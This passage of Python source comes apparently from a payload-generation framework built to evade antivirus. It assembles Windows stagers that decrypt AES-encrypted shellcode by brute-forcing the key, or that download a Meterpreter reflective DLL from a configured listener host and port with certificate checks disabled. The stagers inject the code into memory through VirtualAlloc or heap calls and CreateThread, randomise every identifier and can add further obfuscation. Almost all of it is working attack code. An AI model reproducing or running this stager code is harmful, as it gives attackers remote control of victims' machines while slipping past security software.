num_tabs_required + '\t\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes 
+ '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + 'import os\n' payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n' payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n' payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n' payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \'" + constrained_key + '\' + str(' + key_guess + ')\n' payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_ECB)\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n' payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n' payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n' payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n' payload_code += '\t' * num_tabs_required + '\t\t' + HeapVar + ' = ' + 
randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + '\t\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + '\t\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # randomize everything, yo' sumMethodName = evasion_helpers.randomString() checkinMethodName = evasion_helpers.randomString() randLettersName = evasion_helpers.randomString() randLetterSubName = evasion_helpers.randomString() randBaseName = evasion_helpers.randomString() downloadMethodName = evasion_helpers.randomString() hostName = evasion_helpers.randomString() portName = evasion_helpers.randomString() requestName = evasion_helpers.randomString() tName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() dataName = evasion_helpers.randomString() byteArrayName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() bufName = evasion_helpers.randomString() handleName = evasion_helpers.randomString() data2Name = evasion_helpers.randomString() proxy_var = evasion_helpers.randomString() opener_var = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() # How I'm tracking the number of nested tabs needed # to make the payload num_tabs_required = 0 payload_code = "import urllib.request, string, random, struct, time, ssl, ctypes as " + randctypes + "\n" payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # helper method that returns the sum of all ord values in a string % 0x100 payload_code += "ssl._create_default_https_context = ssl._create_unverified_context\n" payload_code += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" % ( sumMethodName) # method that generates a new checksum value for checkin to the meterpreter handler payload_code += "def %s():\n\tfor x in range(64):\n" % ( checkinMethodName) payload_code += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" % ( randBaseName) payload_code += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" % ( randLettersName) payload_code += "\t\tfor %s in %s:\n" % (randLetterSubName, 
randLettersName) payload_code += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" % ( sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName) # method that connects to a host/port over https and downloads the hosted data payload_code += "def %s(%s,%s):\n" % (downloadMethodName, hostName, portName) payload_code += "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n" payload_code += "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n" payload_code += "\turllib.request.install_opener(" + opener_var + ")\n" payload_code += '\t' * num_tabs_required + "\t" + requestName + " = urllib.request.Request(\"https://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" payload_code += "\ttry:\n" payload_code += "\t\t%s = urllib.request.urlopen(%s)\n" % (tName, requestName) payload_code += "\t\ttry:\n" payload_code += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" % ( tName, tName) payload_code += "\t\t\telse: return ''\n" payload_code += "\t\texcept: return %s.read()\n" % (tName) payload_code += "\texcept urllib.request.URLError: return ''\n" # method to inject a reflective .dll into memory payload_code += "def %s(%s):\n" % (injectMethodName, dataName) payload_code += "\tif %s != \"\":\n" % (dataName) payload_code += "\t\t%s = bytearray(%s)\n" % (byteArrayName, dataName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n" payload_code += '\t' * 
num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n" payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n" # Assuming heap injection else: HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * 
num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n' # download the metpreter .dll and inject it payload_code += "%s = ''\n" % (data2Name) payload_code += "%s = %s(\"%s\", %s)\n" % ( data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += "%s(%s)\n" % (injectMethodName, data2Name) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return